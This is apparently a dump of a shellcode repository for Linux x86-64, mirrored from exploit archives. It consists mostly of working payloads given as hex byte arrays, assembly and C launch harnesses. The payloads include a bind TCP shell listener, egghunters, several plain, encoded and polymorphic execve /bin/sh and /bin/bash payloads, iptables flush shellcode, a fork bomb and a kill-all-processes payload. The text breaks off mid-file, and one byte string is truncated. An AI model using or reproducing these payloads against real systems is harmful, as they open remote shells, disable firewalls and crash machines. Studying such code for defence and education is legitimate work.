"\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" 77 | "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" 78 | "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" 79 | "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" 80 | "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" 81 | "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" 82 | "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" 83 | "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" 84 | "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; 85 | 86 | (*(void (*)()) shellcode)(); 87 | } 88 | 89 | // milw0rm.com [2009-05-18] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files (the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html 25 | 26 | global _start 27 | 28 | section .text 29 | 30 | _start: 31 | ; Socket 32 | push 41 33 | pop rax 34 | push 2 35 | pop rdi 36 | push 1 37 | pop rsi 38 | cdq 39 | syscall 40 | ; Listen 41 | xor esi,esi 42 | xchg eax,edi 43 | mov al,50 44 | syscall 45 | ; Accept 46 | mov al,43 47 | syscall 48 | ; Dup 2 49 | push 3 50 | pop rsi 51 | xchg edi,eax 52 | dup2loop: 53 | push 33 54 | pop rax 55 | dec esi 56 | syscall 57 | jne dup2loop 58 | ; Execve 59 | ; rax and rsi and rdx are zero already 60 | push rax ; zero terminator for the following string that we are pushing 61 | 62 | ; push /bin//sh in reverse 63 | mov rbx, '/bin//sh' 64 | push rbx 65 | 66 | ; store /bin//sh address in RDI 67 | push rsp 68 | pop rdi 69 | 70 | ; Call the Execve syscall 71 | mov al, 59 72 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Egghunter_Shellcode__18_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 Linux egghunter in 18 bytes 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | *Description: x86_64 linux egghunter which searches for the marker. 7 | *Copyright: (c) 2016 iQube. (http://iQube.io) 8 | *Release Date: January 7, 2016 9 | *Tested On: Ubuntu 14.04 LTS 10 | *SLAE64-1408 11 | *Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter 12 | * 13 | *Nasm source: 14 | * 15 | * 16 | global _start 17 | 18 | _start: 19 | 20 | egg: 21 | inc rdx ; Address 22 | push rdx ; pushing the value in the rdx to the stack 23 | pop rdi ; sending rdx to rdi via stack 24 | push 0x50905090 ; pusing the egg marker into the stack 25 | pop rax 26 | inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded 27 | scasd ; check if we have found the egg 28 | jnz egg ; try the next byte in the memory 29 | jmp rdi ; go to the shellcode 30 | 31 | *Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm 32 | ld -o egghunter egghunter.o 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | char hunter[] = \ 39 | "\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7"; 40 | 41 | char execve_code_with_egg[] = \ 42 | //marker 43 | "\x91\x50\x90\x50" 44 | "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; 45 | 46 | int main(){ 47 | printf("Egg Hunter Length: %d\n", (int)strlen(hunter)); 48 | (*(void (*)()) hunter)(); 49 | return 0; 50 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Egghunter_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: x64 Linux egghunter in 24 bytes 3 | ;Author: David Velázquez a.k.a d4sh&r 4 | ;Contact: https://mx.linkedin.com/in/d4v1dvc 5 | ;Description: x64 Linux egghunter that looks for the string "h@ckh@ck" 6 | ; and then execute the shellcode 7 | ;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux 8 | 9 | ;Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm 10 | ; ld -o egghunter egghunter.o 11 | ;SLAE64-1379 12 | 13 | global _start 14 | 15 | _start: 16 | pop rax ; some address in the stack 17 | search: 18 | inc rax 19 | cmp [rax - 4] , dword 0x6b634068 ; "h@ck" 20 | jnz search 21 | cmp [rax - 8] , dword 0x6b634068 ; "h@ck" 22 | jnz search 23 | call rax ; execute shellcode 24 | */ 25 | #include 26 | #include 27 | //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 28 | unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0"; 29 | unsigned char egg[] = \ 30 | "\x68\x40\x63\x6b" //egg 31 | "\x68\x40\x63\x6b" //egg 32 | "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x0$ 33 | 34 | int main() 35 | 36 | { 37 | 38 | printf("Hunter Length: %d\n", (int)strlen(hunter)); 39 | 40 | (*(void (*)()) hunter)(); 41 | 42 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files (the “Software”), 7 | ;to deal in the Software without restriction, including without limitation 8 | ;the rights to use, copy, modify, merge, publish, distribute, sublicense, 9 | ;and/or sell copies of the Software, and to permit persons to whom the 10 | ;Software is furnished to do so, subject to the following conditions: 11 | 12 | ;The above copyright notice and this permission notice shall be included 13 | ;in all copies or substantial portions of the Software. 14 | 15 | ;The Software is provided “as is”, without warranty of any kind, express or 16 | ;implied, including but not limited to the warranties of merchantability, 17 | ;fitness for a particular purpose and noninfringement. In no event shall the 18 | ;authors or copyright holders be liable for any claim, damages or other 19 | ;liability, whether in an action of contract, tort or otherwise, arising 20 | ;from, out of or in connection with the software or the use or other 21 | ;dealings in the Software. 22 | ; 23 | ; For a detailed explanation of this shellcode see my blog post: 24 | ; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html 25 | 26 | global _start 27 | 28 | section .text 29 | 30 | _start: 31 | push 82 32 | pop rax 33 | cdq 34 | push rdx 35 | push word '-F' 36 | push rsp 37 | pop rbx 38 | push rdx 39 | mov rcx, 'iptables' 40 | push rcx 41 | shl al,1 42 | sub al,cl 43 | mov rcx, '//sbin//' 44 | push rcx 45 | push rsp 46 | pop rdi 47 | push rdx 48 | push rbx 49 | push rdi 50 | push rsp 51 | pop rsi 52 | syscall -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Flush_IPTables_Rules___sbin_iptables_-F__Shellcode__84_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | /sbin/iptables -F shellcode for AMD64 (84 bytes) 4 | 5 | By gat3way 6 | 7 | 8 | The code to load the sc[] into an executable mmap()-ed executable page 9 | was shamelessly stolen by hophet (too lazy :)) 10 | Thanks Gustavo C. for the inspiration - x86_64 assembly is fun :) 11 | 12 | # Here is the boring assembly code: 13 | # push /sbin/iptables: 14 | movq $0x73656c626174ffff, %rbx 15 | shr $16, %rbx 16 | push %rbx 17 | movq $0x70692f6e6962732f, %rbx 18 | push %rbx 19 | movq %rsp, %rdi 20 | # push params 21 | movq $0x462dffffffffffff,%rbx 22 | shr $48, %rbx 23 | push %rbx 24 | movq %rsp, %rcx 25 | movq $0x46ffffffffffffff,%rbx 26 | shr $56, %rbx 27 | push %rbx 28 | movq %rsp, %rax 29 | xor %rbx, %rbx 30 | push %rbx 31 | push %rcx 32 | push %rax 33 | movq %rsp,%rsi 34 | movq %rsp,%rdx 35 | # execve 36 | xorq %rax,%rax 37 | mov $0x3b,%al 38 | syscall 39 | 40 | 41 | Hm...pak ne moga da izmislia neshto umno :( 42 | 43 | */ 44 | 45 | 46 | 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | #include 54 | #include 55 | 56 | 57 | char sc[]="\x48\xbb\xff\xff" 58 | "\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" 59 | "\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" 60 | "\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" 61 | "\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" 62 | "\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; 63 | 64 | void main() 65 | { 66 | void (*p)(); 67 | int fd; 68 | 69 | printf("Lenght: %d\n", strlen(sc)); 70 | fd = open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); 71 | if (fd < 0) 72 | err(1, "open"); 73 | 74 | write(fd, sc, strlen(sc)); 75 | if ((lseek(fd, 0L, SEEK_SET)) < 0) 76 | err(1, "lseek"); 77 | 78 | p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); 79 | if (p == (void (*)())MAP_FAILED) 80 | err(1, "mmap"); 81 | p(); 82 | return 0; 83 | } 84 | 85 | // milw0rm.com [2008-11-28] -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Fork_Bomb_Shellcode__11_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - fork() Bomb (11 bytes) 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://twitter.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: WARNING! this shellcode may crash your computer if executed 8 | in your system. 9 | ;Shellcode Length: 11 10 | ;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux 11 | 12 | 13 | 14 | ===COMPILATION AND EXECUTION Assemmbly file=== 15 | 16 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 17 | 18 | #ld shell.o -o shell <=== Making Binary File 19 | 20 | #./bin2shell.sh shell <== xtract hex code from the binary( 21 | https://github.com/touhidshaikh/bin2shell) 22 | 23 | =================SHELLCODE(INTEL FORMAT)================= 24 | 25 | section .text 26 | global _start: 27 | _start: 28 | xor rax,rax 29 | add rax,57 30 | syscall 31 | jmp _start 32 | 33 | ===================END HERE============================ 34 | 35 | ====================FOR C Compile=========================== 36 | 37 | Compile with gcc with some options. 38 | 39 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 40 | 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | 47 | unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5"; 48 | 49 | main() 50 | { 51 | 52 | printf("Shellcode Length: %d\n", (int)strlen(code)); 53 | 54 | int (*ret)() = (int(*)())code; 55 | 56 | ret(); 57 | 58 | } 59 | 60 | /*More Shellcode => Download Link : 61 | https://github.com/touhidshaikh/shellcode/tree/master/Linux */ -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Kill_All_Processes_Shellcode__19_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86_64 - kill() All Processes Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86_64 7 | ;Description: If pid == -1, then sig is sent to every process for which the 8 | calling process has permission to send signals, except for process 1 (init) 9 | ;Shellcode Length: 19 10 | ;Tested on : Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux 11 | 12 | 13 | 14 | ===COMPILATION AND EXECUTION Assemmbly file=== 15 | 16 | #nasm -f elf64 shell.asm -o shell.o <=== Making Object File 17 | 18 | #ld shell.o -o shell <=== Making Binary File 19 | 20 | #./bin2shell.sh shell <== xtract hex code from the binary( 21 | https://github.com/touhidshaikh/bin2shell) 22 | 23 | =================SHELLCODE(INTEL FORMAT)================= 24 | 25 | section .text 26 | global _start: 27 | _start: 28 | xor rax,rax 29 | push byte -1 ; pid = -1, 30 | pop rdi 31 | add rax,9 ; sig 32 | mov rsi,rax 33 | add rax,53 ; kill system call number 9+53=62 34 | syscall 35 | 36 | 37 | ===================END HERE============================ 38 | 39 | ====================FOR C Compile=========================== 40 | 41 | Compile with gcc with some options. 42 | 43 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 44 | 45 | */ 46 | 47 | #include 48 | #include 49 | 50 | unsigned char code[] = \ 51 | "\x48\x31\xc0\x6a\xff\x5f\x48\x83\xc0\x09\x48\x89\xc6\x48\x83\xc0\x35\x0f\x05"; 52 | 53 | 54 | main() 55 | { 56 | 57 | printf("Shellcode Length: %d\n", (int)strlen(code)); 58 | 59 | int (*ret)() = (int(*)())code; 60 | 61 | ret(); 62 | 63 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Encoded_Shellcode__57_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Compile with: gcc -fno-stack-protector -z execstack 3 | This execve shellcode is encoded with 0xff and is for 64 bit linux. 4 | 5 | shell: file format elf64-x86-64 6 | 7 | 8 | Disassembly of section .text: 9 | 10 | 0000000000400080 : 11 | 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff 12 | 400087: ff ff ff 13 | 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae 14 | 400091: f0 fa ff 15 | 400094: 49 31 c8 xor r8,rcx 16 | 400097: 41 50 push r8 17 | 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0 18 | 4000a0: d0 8c 97 19 | 4000a3: 49 31 c8 xor r8,rcx 20 | 4000a6: 41 50 push r8 21 | 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7 22 | 4000af: c4 b7 46 23 | 4000b2: 49 31 c8 xor r8,rcx 24 | 4000b5: 41 50 push r8 25 | 4000b7: ff e4 jmp rsp 26 | 27 | 2015 William Borskey 28 | 29 | */ 30 | char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4"; 31 | 32 | int main(int argc, char **argv) 33 | { 34 | int (*func)(); 35 | func = (int (*)()) shellcode; 36 | (int)(*func)(); 37 | return 0; 38 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Polymorphic_Shellcode__31_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: polymorphic execve shellcode 3 | ;Author: d4sh&r 4 | ;Contact: https://mx.linkedin.com/in/d4v1dvc 5 | ;Category: Shellcode 6 | ;Architecture:linux x86_64 7 | ;SLAE64-1379 8 | ;Description: 9 | ;Polymorphic shellcode in 31 bytes to get a shell 10 | ;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux 11 | 12 | ;Compilation and execution 13 | ;nasm -felf64 shell.nasm -o shell.o 14 | ;ld shell.o -o shell 15 | ;./shell 16 | 17 | global _start 18 | 19 | _start: 20 | mul esi 21 | push rdx 22 | mov al,1 23 | mov rbx, 0xd2c45ed0e65e5edc ;/bin//sh 24 | rol rbx,24 25 | shr rbx,1 26 | push rbx 27 | lea rdi, [rsp] ;address of /bin//sh 28 | add al,58 29 | syscall 30 | 31 | */ 32 | #include 33 | //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 34 | unsigned char code[] = "\xf7\xe6\x52\xb0\x01\x48\xbb\xdc\x5e\x5e\xe6\xd0\x5e\xc4\xd2\x48\xc1\xc3\x18\x48\xd1\xeb\x53\x48\x8d\x3c\x24\x04\x3a\x0f\x05"; 35 | 36 | main() 37 | { 38 | int (*ret)()=(int(*)()) code; 39 | ret(); 40 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;Title: execve shellcode 22 bytes 2 | ;Author: d4sh&r 3 | ;Contact: https://mx.linkedin.com/in/d4v1dvc 4 | ;Category: Shellcode 5 | ;Architecture:linux x86_64 6 | ;SLAE64-1379 7 | ;Description: 8 | ;Shellcode in 22 bytes to get a shell 9 | ;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux 10 | 11 | ;Compilation and execution 12 | ;nasm -felf64 shell.nasm -o shell.o 13 | ;ld shell.o -o shell 14 | ;./shell 15 | 16 | global _start 17 | 18 | _start: 19 | mul esi 20 | push rdx 21 | mov rbx, 0x68732f2f6e69622f ;/bin//sh 22 | push rbx 23 | lea rdi, [rsp] ;address of /bin//sh 24 | mov al, 59 ;execve 25 | syscall 26 | 27 | /*compile with gcc -fno-stack-protector -z exestack */ 28 | 29 | unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"; 30 | 31 | main() 32 | { 33 | int (*ret)()=(int(*)()) code; 34 | ret(); 35 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_Stack_Polymorphic_Shellcode__47_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 linux Polymorphic execve-stack 47 bytes 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | * Copyright: (c) 2016 iQube. (http://iQube.io) 7 | * Release Date: January 6, 2016 8 | *Description: X86_64 linux Polymorphic execve-stack 47 bytes 9 | *Tested On: Ubuntu 14.04 LTS 10 | *SLAE64-1408 11 | *Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode 12 | * ./shellcode 13 | * 14 | global _start 15 | 16 | _start: 17 | 18 | xor esi, esi 19 | xor r15, r15 20 | mov r15w, 0x161f 21 | sub r15w, 0x1110 22 | push r15 23 | mov r15, rsp 24 | mov rdi, 0xff978cd091969dd0 25 | inc rdi 26 | neg rdi 27 | mul esi 28 | add al, 0x3b 29 | push rdi 30 | push rsp 31 | pop rdi 32 | call r15 33 | */ 34 | 35 | 36 | #include 37 | #include 38 | 39 | unsigned char code[] = \ 40 | "\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7"; 41 | main() 42 | { 43 | 44 | printf("Shellcode Length: %d\n", (int)strlen(code)); 45 | 46 | int (*ret)() = (int(*)())code; 47 | 48 | ret(); 49 | 50 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve_XOR_NOT_DIV_Encoded_Shellcode__54_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------------------------------------------------------- 2 | /* 3 | *Title: x86_64 linux-Xor/not/div encoded execve shellcode 4 | *Author: Sathish kumar 5 | *Contact: https://www.linkedin.com/in/sathish94 6 | * Copyright: (c) 2016 iQube. (http://iQube.io) 7 | * Release Date: January 6, 2016 8 | *Description: X86_64 linux-Xor/not/div encoded execve shellcode 54 bytes 9 | *Tested On: Ubuntu 14.04 LTS 10 | *SLAE64-1408 11 | *Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell 12 | * ./bindshell 13 | * 14 | * 15 | */ 16 | /* 17 | global _start 18 | section .text 19 | _start: 20 | 21 | 22 | jmp short call_shellcode 23 | 24 | 25 | decoder: 26 | pop rdi 27 | xor rcx, rcx 28 | xor rdx, rdx 29 | xor rax, rax 30 | mov cl, 26 31 | 32 | decode: 33 | not byte [rdi] ; not function is appplied 34 | xor byte [rdi], 0xee ; xor function with 0xee 35 | mov rax, rdi ; multiplication is done 36 | mov ecx, 0x2 37 | mul ecx 38 | mov rdi, rax 39 | inc rdi 40 | loop decode ; loop continues until the shellcode size is completed 41 | 42 | jmp short shellcode_to_decode ; Pointed to the decoded shellcode 43 | 44 | call_shellcode: 45 | call decoder 46 | shellcode_to_decode: db 0x35,0x09,0x6a,0x35,0x6a,0x62,0x22,0x39,0x35,0x4c,0x06,0x20,0x25,0x26,0x06,0x06,0x28,0x25,0x38,0x3b,0x3e,0x24,0x0c,0x3d,0x16,0x13 47 | */ 48 | 49 | #include 50 | #include 51 | 52 | unsigned char code[] = \ 53 | "\xeb\x15\x5f\x48\x31\xc9\xb1\x1a\x80\x37\xee\xf6\x17\x80\x2f\x03\x48\xff\xc7\xe2\xf3\xeb\x05\xe8\xe6\xff\xff\xff\x5a\x25\xe8\x5a\xeb\xf8\x78\x42\x5a\xaf\x23\x74\x7d\x60\x23\x23\x67\x7a\x47\x46\x73\x7c\x2f\x4a\x03\x19"; 54 | main() 55 | { 56 | 57 | printf("Shellcode Length: %d\n", (int)strlen(code)); 58 | 59 | int (*ret)() = (int(*)())code; 60 | 61 | ret(); 62 | 63 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve___sbin_iptables_,____sbin_iptables_,__-F__,_NULL__Shellcode__49_bytes___Shellcode_exploit_for_Lin_x86-64___/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) - 49 bytes 3 | Author: 10n1z3d <10n1z3d[at]w[dot]cn> 4 | Date: Fri 09 Jul 2010 03:26:12 PM EEST 5 | 6 | 7 | Source Code (NASM): 8 | 9 | section .text 10 | global _start 11 | 12 | _start: 13 | xor rax, rax 14 | push rax 15 | push word 0x462d 16 | mov rcx, rsp 17 | 18 | mov rbx, 0x73656c626174ffff 19 | shr rbx, 0x10 20 | push rbx 21 | mov rbx, 0x70692f6e6962732f 22 | push rbx 23 | mov rdi, rsp 24 | 25 | push rax 26 | push rcx 27 | push rdi 28 | mov rsi, rsp 29 | 30 | ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL); 31 | mov al, 0x3b 32 | syscall 33 | */ 34 | 35 | #include 36 | 37 | char shellcode[] = "\x48\x31\xc0\x50\x66\x68\x2d\x46\x48\x89\xe1\x48\xbb\xff\xff" 38 | "\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73" 39 | "\x62\x69\x2f\x69\x70\x53\x48\x89\xe7\x50\x51\x57\x48\x89\xe6" 40 | "\xb0\x3b\x0f\x05"; 41 | 42 | int main() 43 | { 44 | printf("Length: %d bytes.\n'", strlen(shellcode)); 45 | (*(void(*)()) shellcode)(); 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_bash_Shellcode__33_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | --------------------------------------------------------------------------------------------------- 3 | 4 | Linux/x86_x64 - execve(/bin/bash) - 33 bytes 5 | 6 | Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] 7 | 8 | Om Asato Maa Sad-Gamaya | 9 | Tamaso Maa Jyotir-Gamaya | 10 | Mrtyor-Maa Amrtam Gamaya | 11 | Om Shaantih Shaantih Shaantih | 12 | 13 | --------------------------------------------------------------------------------------------------- 14 | Disassembly of section .text: 15 | 16 | 0000000000400080 <.text>: 17 | 400080: eb 0b jmp 0x40008d 18 | 400082: 5f pop rdi 19 | 400083: 48 31 d2 xor rdx,rdx 20 | 400086: 52 push rdx 21 | 400087: 5e pop rsi 22 | 400088: 6a 3b push 0x3b 23 | 40008a: 58 pop rax 24 | 40008b: 0f 05 syscall 25 | 40008d: e8 f0 ff ff ff call 0x400082 26 | 400092: 2f (bad) 27 | 400093: 2f (bad) 28 | 400094: 2f (bad) 29 | 400095: 2f (bad) 30 | 400096: 62 (bad) 31 | 400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f 32 | 40009e: 62 .byte 0x62 33 | 40009f: 61 (bad) 34 | 4000a0: 73 68 jae 0x40010a 35 | --------------------------------------------------------------------------------------------------- 36 | 37 | How To Run 38 | 39 | $ gcc -o bash_shell bash_shell.c 40 | $ execstack -s bash_shell 41 | $ ./bash_shell 42 | 43 | --------------------------------------------------------------------------------------------------- 44 | */ 45 | #include 46 | char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68"; 47 | void main(int argc, char **argv) 48 | { 49 | int (*func)(); 50 | func = (int (*)()) sh; 51 | (int)(*func)(); 52 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Null-Free_Shellcode__30_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | William Borskey 2015 3 | Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 4 | 5 | 1 ; int execve(const char *filename, char *const argv[], char *const envp[]); 6 | 2 BITS 64 7 | 3 8 | 4 section .text 9 | 5 global start 10 | 6 11 | 7 start: 12 | 8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 13 | 9 ;little endian byte order into rcx padded with 11 14 | 10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding 15 | 11 shr rcx, 0x08 ;ringht shift to re order string 16 | 12 push rcx ;push the immediate value stored in rcx onto the stack 17 | 13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi 18 | 14 xor rdx, rdx ;zero out rdx for an execve argument 19 | 15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls 20 | 16 syscall ;make the syscall 21 | */ 22 | 23 | char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"; 24 | 25 | int main(int argc, char **argv) 26 | { 27 | int (*func)(); 28 | func = (int (*)()) shellcode; 29 | (int)(*func)(); 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_execve__bin_sh_Shellcode__22_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;The MIT License (MIT) 2 | 3 | ;Copyright (c) 2017 Robert L. Taylor 4 | 5 | ;Permission is hereby granted, free of charge, to any person obtaining a 6 | ;copy of this software and associated documentation files 